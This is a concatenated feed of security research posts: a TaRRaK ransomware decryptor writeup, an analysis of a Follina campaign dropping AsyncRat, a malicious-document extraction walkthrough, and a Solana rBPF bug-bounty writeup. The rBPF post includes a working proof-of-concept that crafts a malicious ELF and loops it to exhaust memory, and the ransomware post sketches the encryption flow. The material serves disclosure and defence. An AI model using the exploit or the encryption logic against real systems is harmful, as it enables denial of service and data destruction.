
Decrypted: TaRRaK Ransomware

6 June 2022 at 12:10

The TaRRaK ransomware appeared in June of 2021. This ransomware contains many coding errors, so we decided to publish a small blog about them. Samples of this ransomware were spotted in our user base, so we also created a decryptor for this ransomware.

Skip to instructions on how to use the TaRRaK decryptor.

Behavior of the ransomware

The ransomware is written in .NET. The binary is very clean and contains no protections or obfuscations. When executed, the sample creates a mutex named TaRRaK in order to ensure that only one instance of the malware is executed. Also, an auto-start registry entry is created in order to execute the ransomware on every user login:

The ransomware contains a list of 178 file types (extensions) that, when found, are encrypted:

3ds 7z 7zip acc accdb ai aif apk asc asm asf asp aspx avi backup bak bat bin bmp c cdr cer cfg cmd cpp crt crw cs csproj css csv cue db db3 dbf dcr dds der dmg dng doc docm docx dotx dwg dxf dxg eps epub erf flac flv gif gpg h html ico img iso java jpe jpeg jpg js json kdc key kml kmz litesql log lua m3u m4a m4u m4v max mdb mdf mef mid mkv mov mp3 mp4 mpa mpeg mpg mrw nef nrw obj odb odc odm odp ods odt orf p12 p7b p7c part pdb pdd pdf pef pem pfx php plist png ppt pptm pptx ps ps1 psd pst ptx pub pri py pyc r3d raf rar raw rb rm rtf rwl sav sh sln suo sql sqlite sqlite3 sqlitedb sr2 srf srt srw svg swf tga thm tif tiff tmp torrent txt vbs vcf vlf vmx vmdk vdi vob wav wma wmi wmv wpd wps x3f xlk xlm xls xlsb xlsm xlsx xml zip

The ransomware avoids folders containing one of the following strings:

  • All Users\Microsoft\
  • $Recycle.Bin
  • :\Windows
  • \Program Files
  • Temporary Internet Files
  • \Local\Microsoft\
  • :\ProgramData\

Encrypted files are given a new extension .TaRRaK. They also contain the TaRRaK signature at the beginning of the encrypted file:

File Encryption

The implementation of the encryption is a nice example of buggy code:

First, the ransomware attempts to read the entire file into memory using File.ReadAllBytes(). This function has an internal limit – a maximum of 2 GB of data can be loaded. If the file is larger, the function throws an exception, which is then handled by the try-catch block. Unfortunately, the try-catch block only handles a permission-denied condition: it adds an ACL entry granting full access to everyone and retries the read operation. In case of any other error (read failure, sharing violation, out of memory, read from an offline file), the exception is raised again and the ransomware is stuck in an infinite loop.

Even if the data load operation succeeds and the file data fits in memory, there's another catch. The Encrypt function converts the array of bytes to an array of 32-bit integers:

This allocates another block of memory of the same size as the file. The ransomware then performs the encryption using a custom algorithm, and the encrypted UInt32 array is converted to yet another array of bytes and written to the file. So, in addition to the memory allocated for the original file data, two extra blocks of the same size are allocated. If any of these allocations fails, an exception is thrown and the ransomware is, again, stuck in an infinite loop.
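
The ransomware is .NET code, but the overall data flow of the Encrypt routine can be illustrated with a short Python sketch (purely illustrative, not the decompiled code; the per-word XOR below is just a placeholder for TaRRaK's custom cipher):

import struct

def encrypt_file_sketch(path):
    # Allocation #1: the entire file is read into memory at once
    # (File.ReadAllBytes() in the original .NET code, capped at 2 GB).
    data = open(path, "rb").read()

    # Allocation #2: the byte array is converted into an array of
    # 32-bit integers of roughly the same total size.
    padded = data + b"\x00" * (-len(data) % 4)
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)

    # The real sample applies its own custom algorithm here; a simple
    # XOR stands in for it in this sketch.
    words = [w ^ 0xA5A5A5A5 for w in words]

    # Allocation #3: the encrypted words are packed back into a third
    # byte buffer and written over the original file.
    open(path, "wb").write(struct.pack("<%dI" % len(words), *words))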

In the rare case when the encryption process finishes (no sharing violation or another error), the ransom note file named Encrypted Files by TaRRaK.txt is dropped to the root folder of each drive:

Files with the .TaRRaK extension are associated with their own icon:

Finally, desktop wallpaper is set to the following bitmap:

How to use the Avast decryptor to decrypt files encrypted by TaRRaK Ransomware

To decrypt your files, follow these steps:

  1. You must be logged in to the same user account as the one under which the files were encrypted.
  2. Download the free Avast decryptor for 32-bit or 64-bit Windows.
  3. Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  4. On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
  5. On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
  6. On the final page, you can opt in to back up encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

IOCs

SHA256
00965b787655b23fa32ef2154d64ee9e4e505a42d70f5bb92d08d41467fb813d
47554d3ac4f61e223123845663c886b42016b4107e285b7da6a823c2f5050b86
aafa0f4d3106755e7e261d337d792d3c34fc820872fd6d1aade77b904762d212
af760d272c64a9258fab7f0f80aa2bba2a685772c79b1dec2ebf6f3b6738c823

The post Decrypted: TaRRaK Ransomware appeared first on Avast Threat Labs.

Outbreak of Follina in Australia

Our threat hunters have been busy searching for abuse of the recently disclosed zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.

Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.

Key Observations

This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initiate the attack using the CVE-2022-30190 vulnerability in the Microsoft Support Diagnostic Tool. The vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine, which might otherwise be detected by endpoint protection.

Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.

First stage

The compromised website, as pictured in the screenshot below, was used to host an executable disguised as “robots.txt”. We believe the name was chosen to conceal the file from detection if it appeared in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this “robots.txt” file was downloaded, saved as Sihost.exe, and then executed.

Second Stage, Sihost.exe

When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe, it downloaded the second stage of the attack, a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.

Third stage, favicon.svg

Once decrypted, this file is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au: two files named Sevntx64.exe and Sevntx64.lnk, which are then executed on the victim's machine.

Fourth Stage, Sevntx64.exe and Sevntx64.lnk

When the file is executed, it loads 66 KB of shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.

The screenshot below shows the executable loading the shellcode.

Final Stage, AsyncRat

When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.

AsyncRat SHA256:

aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Screenshot below with AsyncRat configuration:

Conclusion

We highly recommend using Avast to protect against the latest threats, and applying Microsoft's patches to protect your Windows systems from the CVE-2022-30190 vulnerability.

IOCs:

  • main webpage: 0af202af06aef4d36ea151c5a304414a67aee18c3675286275bd01d11a760c04
  • robots.txt: b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447
  • favicon.svg: ed4091700374e007ae478c048734c4bc0b7fe0f41e6d5c611351bf301659eee0
  • decrypted favicon.svg: 9651e604f972e36333b14a4095d1758b50decda893e8ff8ab52c95ea89bb9f74
  • Sevntx64.exe: f3ccf22db2c1060251096fe99464002318baccf598b626f8dbdd5e7fd71fd23f
  • Sevntx64.lnk: 33297dc67c12c7876b8052a5f490cc6a4c50a22712ccf36f4f92962463eb744d
  • shellcode from Sevntx64.exe (66814 bytes): 7d6d317616d237ba8301707230abbbae64b2f8adb48b878c528a5e42f419133a
  • asyncrat: aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Bonus

We managed to find an earlier version of this malware.

  • Grievance Against Lawyers, Judge or Justice.doc.exe (signed): 87BD2DDFF6A90601F67499384290533701F5A5E6CB43DE185A8EA858A0604974 (first seen 26.05.2022, NL, proxy)
  • Grievance Against Lawyers, Judge or Justice (1).zip\Grievance Against Lawyers, Judge or Justice.doc.exe: 0477CAC3443BB6E46DE9B904CBA478B778A5C9F82EA411D44A29961F5CC5C842 (first seen 18.05.2022, Palau, previous victim)

Forensic information from the lnk file:

field value
Application Sevntx64.exe
Accessed time 2022-05-19 09:34:26
Birth droid MAC address 00:0C:29:59:3C:CC
Birth droid file ID 0e711e902ecfec11954f000c29593ccc
Birth droid volume ID b097e82425d6c944b33e40f61c831eaf
Creation time 2022-05-19 10:29:34
Drive serial number 0xd4e21f4f
Drive type DRIVE_FIXED
Droid file ID 0e711e902ecfec11954f000c29593ccc
Droid volume ID b097e82425d6c944b33e40f61c831eaf
File flags FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_READONLY
Known folder ID af2448ede4dca84581e2fc7965083634
Link flags EnableTargetMetadata, HasLinkInfo, HasRelativePath, HasTargetIDList, HasWorkingDir, IsUnicodeLocal
base path C:\Users\Public\Documents\Sevntx64.exe
Location Local
MAC address 00:0C:29:59:3C:CC
Machine identifier desktop-eev1hc3
Modified time 2020-08-19 04:13:44
Relative path .\Sevntx64.exe
Size 1543
Target file size 376368
Working directory C:\Users\Public\Documents

The post Outbreak of Follina in Australia appeared first on Avast Threat Labs.

Malicious Document Analysis: Example 2

14 January 2022 at 16:45

I returned to writing the second article of the Malware Analysis Series (MAS) on January 8th, after receiving outstanding support from a high-profile professional and company in the industry. While that article is not ready yet (I'm working on page 43 and far from the end), I spent a couple of hours writing a simple and short article on malicious document analysis. I hope it helps someone.

The PDF version is available on: https://exploitreversing.files.wordpress.com/2022/01/mda_2-2.pdf

Keep reversing and have an excellent day.

Alexandre Borges.

Malware Analysis Series (MAS) – Article 1

3 December 2021 at 08:17

The first article of MAS (Malware Analysis Series) is available for reading from:

(link): https://exploitreversing.files.wordpress.com/2021/12/mas_1_rev_1.pdf

As soon as I have enough time, I'll publish an HTML version of it.

Have an excellent day.

Alexandre Borges.

PS: this is a live document, so new versions of it will be published as errors and mistakes are found.

Malicious Document Analysis: Example 1

2 November 2021 at 20:21

The PDF version of this article can be found here: https://exploitreversing.files.wordpress.com/2021/11/mda_1-2.pdf

Introduction

While the first article of MAS (Malware Analysis Series) is not ready, I'm leaving here a very simple case of malicious document analysis to help my Twitter followers and any professional interested in learning how to analyze this kind of artifact.

Before starting the analysis, I’m going to use the following environment and tools:

Furthermore, it’s always recommended to install Oletools (from Decalage — @decalage2):

# python -m pip install -U oletools

All three tools above are usually installed on REMnux by default. However, if you are using Ubuntu or any other Linux distribution, you can install them using the links and the command above.

Like any common binary, we can analyze any maldoc using static or dynamic analysis, but as my preferred approach is always the former, let's take that route.

We’ll be analyzing the following sample: 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Downloading sample and gathering information

The first step is getting general information about this hash by using any well-known endpoint such as Virus Total, Hybrid Analysis, Triage, Malware Bazaar and so on. Therefore, let's use Malwoverview to do it on the command line and collect information from Malware Bazaar which, fortunately, also brings information from the excellent Triage:

remnux@remnux:~/articles$ malwoverview.py -b 1 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc


Analyzing the malicious document

Given the output above, we can assume that the dropped executable comes from the maldoc itself, because Microsoft Office loads a VBA resource and a possible macro or embedded object is present. Furthermore, the maldoc seems to elevate privileges (AdjustPrivilege()), install a hook procedure into a hook chain to intercept events (SetWindowsHookEx()), and possibly perform code injection (WriteProcessMemory()), so it's reasonable to assume these Triage signatures are associated with an embedded executable. Therefore, it's time to download the malicious document from Triage (you can also do it from the https://tria.ge/dashboard website, if you wish):

remnux@remnux:~/articles$ malwoverview.py -b 5 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Uncompress it by executing the following command (password is “infected”) and collect information using the olevba tool:

remnux@remnux:~/articles$ 7z e 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.zip

Using olevba and oleid (from oletools) to collect further information, we have the following outputs:

remnux@remnux:~/articles$ olevba -a 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx


remnux@remnux:~/articles$ oleid 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx


From both previous outputs, important facts come up:

  • Some code is executed when the document is opened in MS Word.
  • A file seems to be written to the file system.
  • The maldoc seems to open a file (probably the same written above).
  • VBA macros are responsible for the entire activity.

The next step is to analyze the maldoc, which is an OLE document. We are going to use oledump.py (from Didier Stevens's suite — @DidierStevens) to check the OLE file's internals and try to understand what's happening:


According to the figure above, we have:

  • three macros in streams 16, 17 and 18.
  • a big "content" in stream 11, which could be one of the "VBA resources" mentioned in Triage's output.

Once again, we could use dynamic analysis (a debugger) or static analysis to expose the real threat hidden inside this malicious document, but let's proceed with static analysis because it will bring more details while addressing the problem.

In the next step, we need to check the macros' content by decompressing them (-v option) using oledump.py:

remnux@remnux:~/articles$ oledump.py -s 16 -v 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx | more


There are a few details that can be observed from the output above:

  • Obviously the code is obfuscated.
  • The Split function, which returns a zero-based, one-dimensional array containing substrings, manipulates the content from UserForm1 (object 11) and, apparently, this content is divided into four parts (TextBox1, TextBox2, TextBox3 and TextBox4). In addition, the UserForm1 content seems to be separated by the "!" character.
  • UserForm2 is also being used (TextBox1 and TextBox2) in a MoveFile operation.
  • The Winmgmt service, which is a WMI service operating inside the svchost process under the LocalSystem account, is being used to execute an operation given by UserForm2.TextBox5.
  • UserForm2.Text6 is used to create a reference to an object provided by ActiveX.
  • UserForm2.Text7 is being used to save some content as a binary file.

Therefore we must investigate the content of object 15 (Macros/UserForm2/o):

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 15 -d | strings


We can infer from the figure above that:

  • UserForm2.Text1: C:\Users\Public\Pictures\winword.con
  • UserForm2.Text2: C:\Users\Public\Pictures\winword.exe
  • We are moving winword.com to winword.exe within the C:\Users\Public\Pictures\ directory.
  • UserForm2.Text3: Scripting.FileSystemObject
  • UserForm2.Text4: winmgmts:{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2}
  • UserForm2.Text5: Win32_ProcessStartup
  • UserForm2.Text6: winmgmts:root\cimv2:Win32_Process
  • UserForm2.Text7: ADODB.Stream

The remaining macros don't hold anything really critical for our analysis this time:

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 17 -v | strings | tail +9

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 18 -v | strings | tail +9


Analyzing the image above (check the SaveBinaryData() function) and the previous figures, it's reasonable to assume that an executable, which we don't know yet, will be saved as winword.com and later renamed to winword.exe within the C:\Users\Public\Pictures\ directory. Finally, the binary will be executed by calling the objProcess.create() function.

At this point, we should verify the content of object 11 (check "Macros/UserForm1/o") because it likely contains our "hidden" executable. Thus, run the following command:

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d | more


As we expected and mentioned previously, these decimal numbers are separated by the "!" character.

Additionally, there's a catch: according to the last figure, this object has 4 parts (UserForm1.Text1, UserForm1.Text2, UserForm1.Text3 and UserForm1.Text4), so we should dump it into a file (dump1), edit it and "join" all the parts.

To dump "object 11" into a file (named dump1), execute the following command:

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d > dump1

We need to "clean up" the dump1 file:

  • Edit the file using the "vi" command or any other editor.
  • Use "$" to go to the end of each line.
  • Remove occurrences of the word "Tahoma" and any garbage (easily identified) from the text.
  • Join each line with the next one ("J" command in "vi").

After editing the dump1 file, we have to replace all "!" characters with commas and transform all the decimal numbers into bytes. First, replace all "!" characters with commas using a simple "sed" command:

remnux@remnux:~/articles$ sed -e 's/!/,/g' dump1 > dump3

remnux@remnux:~/articles$ cat dump3 | more


From this point, we have to process and transform this file (dump3) into something useful, and we have two clear options: using CyberChef or writing a small script.

I'm going to show you both methods, though I always prefer programming a small script. Please pay attention to the fact that all decimal numbers are separated by commas, so this will demand extra care during the decoding operation.

To decode this file on CyberChef you have to:

  • Load it into CyberChef's input pane. There's a button at the top right to do it.
  • Pick the "From Decimal" operation and configure the delimiter as "Comma".

Afterwards, you'll see an executable in the Output pane, which can be saved to the file system.


Save the file from the Output pane and check its type:

remnux@remnux:~/Downloads$ file download.dat

download.dat: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

It's excellent! Let's now write a simple Python script named python_convert.py to perform the same operation and get the same result:
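
The script itself isn't reproduced in this text; a minimal sketch with the same effect (assuming dump3 contains the comma-separated decimal values produced by the sed command above) could look like this:

# Minimal reconstruction of the conversion script: read the comma-separated
# decimal values from dump3 and write them out as raw bytes.
with open("dump3", "r") as f:
    fields = f.read().split(",")

# Ignore anything that isn't a plain decimal number (leftover garbage, blanks).
values = [int(v) for v in (field.strip() for field in fields) if v.isdigit()]

with open("final_file.bin", "wb") as out:
    out.write(bytes(values))

print("wrote %d bytes to final_file.bin" % len(values))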


remnux@remnux:~/articles$ python3.8 ./python_convert_1.py

remnux@remnux:~/articles$ file final_file.bin

final_file.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

As we expected, it worked! Finally, let's check the final binary on Virus Total and Triage to learn a bit more about the extracted binary (next figures):


It would be super easy to extract the same malware from the maldoc by using dynamic analysis. You'll find out that a password is protecting the VBA project, but it's quite trivial to remove this kind of protection:


That's it! I hope you have learned something new from this article, and see you in the next one.

 

                                                                                    A.B.

The start

7 September 2021 at 19:23

“Long is the way and hard, that out of hell leads up to light.”

(by John Milton from Paradise Lost — 1667)

My name is Alexandre Borges and I'm a security researcher focused on reverse engineering, exploit development and programming. Therefore, I'll try to keep this blog updated, including write-ups about these topics.

Honestly, I hope you can learn something from my posts.

Please, you should feel free to contact me and comment about any mistake and inaccuracy.

Have an excellent day.

A.B.


Earn $200K by fuzzing for a weekend: Part 2

By: addison
11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found within approximately two hours of starting the fuzzer.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forcibly terminated. As a result, the leaking program was running out of this meter exactly at the call instruction (the 65,534 loop instructions plus the shift and the call add up to exactly 65,536, i.e. 1 << 16).

A faulty optimisation

There is a wall of text at line 420 of jit.rs which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call, in order to reduce the number of times they update and check the meter. This optimisation is totally reasonable; we don't care if we run out of instructions in the middle of a block because the subsequent instructions are still "safe", and if we ever hit an exit, that's the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.
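
Conceptually, the block-level metering looks something like the following sketch (plain Python for illustration, not rBPF's actual code): the cost of a whole block is charged in one go at the block boundary, which is fine as long as nothing observable happens between the point where the budget is logically exhausted and the point where the check runs.

# Conceptual sketch of block-boundary instruction metering.
class ExceededMaxInstructions(Exception):
    pass

def run(blocks, remaining):
    # 'blocks' is a list of basic blocks, each a list of zero-argument callables.
    for block in blocks:
        for insn in block:
            insn()                # no per-instruction meter bookkeeping
        remaining -= len(block)   # charge the whole block at once...
        if remaining < 0:         # ...and only check at the boundary
            raise ExceededMaxInstructions()
    return remaining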

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
    • our meter updates here
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

  1. invoke the call, which fails because the symbol is unresolved
  2. to report the unresolved symbol, we invoke that report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
  3. the pc is updated
  4. the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and never dropped. Thus: any pointer to that heap allocation is lost and will never be freed, leading to the leak.

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.

Weaponisation

Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source
pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_mul(ebpf::INSN_SIZE)
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                            .dynsyms
                            .get(relocation.r_sym)
                            .ok_or(ElfError::UnknownSymbol(relocation.r_sym))?;
                        name = elf
                            .dynstrtab
                            .get_at(sym.st_name)
                            .ok_or(ElfError::UnknownSymbol(sym.st_name))?;
                    }
                }
                _ => (),
            }
        }
    }
    Err(ElfError::UnresolvedSymbol(
        name.to_string(),
        file_offset
            .checked_div(ebpf::INSN_SIZE)
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))
            .unwrap_or(ebpf::ELF_INSN_DUMP_OFFSET),
        file_offset,
    )
    .into())
}

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

Creating an unresolved relocation in BPF is actually quite simple: we just need to declare, but not define, a function with a very, very long name. To do so, I created two files to craft the malicious ELF:

evil.h

evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h
evil.c
#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");
  EVIL();
}

Note that goto +0 is used here because we'll use a specialised instruction meter that can only execute two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

elf-memleak.rs

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/evil.so").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();
        }
    }
}

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.

Reporting

Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

entrypoint:
    goto +0
    r0 = 0
    call -1

where the tail call's immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with an instruction meter set to 2 instructions remaining.

The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommended to run this only for a short period of time and cancel it quickly, as it rapidly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear what exactly caused it. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0
    exit

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to an immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.

So why isn’t it?

The curse of x86

Let's make our payload clearer and execute it directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for the OOB write:

oob-write.rs

This code likely no longer works due to the API of rBPF changing in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        Arch,
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
        Source,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
